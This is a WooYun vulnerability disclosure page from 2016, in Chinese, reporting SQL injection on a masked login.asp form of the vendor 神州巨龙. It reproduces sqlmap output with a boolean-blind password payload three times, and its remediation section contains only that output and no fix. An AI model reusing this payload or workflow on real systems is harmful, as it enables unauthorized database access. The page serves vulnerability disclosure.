当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166175

漏洞标题:神州巨龙某处存在Sql注入

相关厂商:神州巨龙

漏洞作者: 路人甲

提交时间:2016-01-03 23:24

修复时间:2016-02-22 21:30

公开时间:2016-02-22 21:30

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-03: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

神州巨龙某处存在Sql注入

详细说明:

http://**.**.**.**/zuoye/zuoye1303/login.asp
POST注入
POST data: username=&password=
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: username=&password=] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[18:10:35] [INFO] resuming back-end DBMS 'microsoft access'
[18:10:35] [INFO] using '/root/.sqlmap/output/results-12302015_0610pm.csv' as the CSV results file in multiple targets mode
[18:10:36] [INFO] heuristics detected web page charset 'GB2312'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
Payload: username=qYuD&password=-4796' OR 7571=7571%16
---
do you want to exploit this SQL injection? [Y/n]
[18:10:37] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[18:10:37] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12302015_0610pm.csv'
[*] shutting down at 18:10:37

漏洞证明:

http://**.**.**.**/zuoye/zuoye1303/login.asp
POST注入
POST data: username=&password=
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: username=&password=] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[18:10:35] [INFO] resuming back-end DBMS 'microsoft access'
[18:10:35] [INFO] using '/root/.sqlmap/output/results-12302015_0610pm.csv' as the CSV results file in multiple targets mode
[18:10:36] [INFO] heuristics detected web page charset 'GB2312'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
Payload: username=qYuD&password=-4796' OR 7571=7571%16
---
do you want to exploit this SQL injection? [Y/n]
[18:10:37] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[18:10:37] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12302015_0610pm.csv'
[*] shutting down at 18:10:37

修复方案:

http://**.**.**.**/zuoye/zuoye1303/login.asp
POST注入
POST data: username=&password=
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: username=&password=] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[18:10:35] [INFO] resuming back-end DBMS 'microsoft access'
[18:10:35] [INFO] using '/root/.sqlmap/output/results-12302015_0610pm.csv' as the CSV results file in multiple targets mode
[18:10:36] [INFO] heuristics detected web page charset 'GB2312'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
Payload: username=qYuD&password=-4796' OR 7571=7571%16
---
do you want to exploit this SQL injection? [Y/n]
[18:10:37] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[18:10:37] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12302015_0610pm.csv'
[*] shutting down at 18:10:37

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-01-08 21:44

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无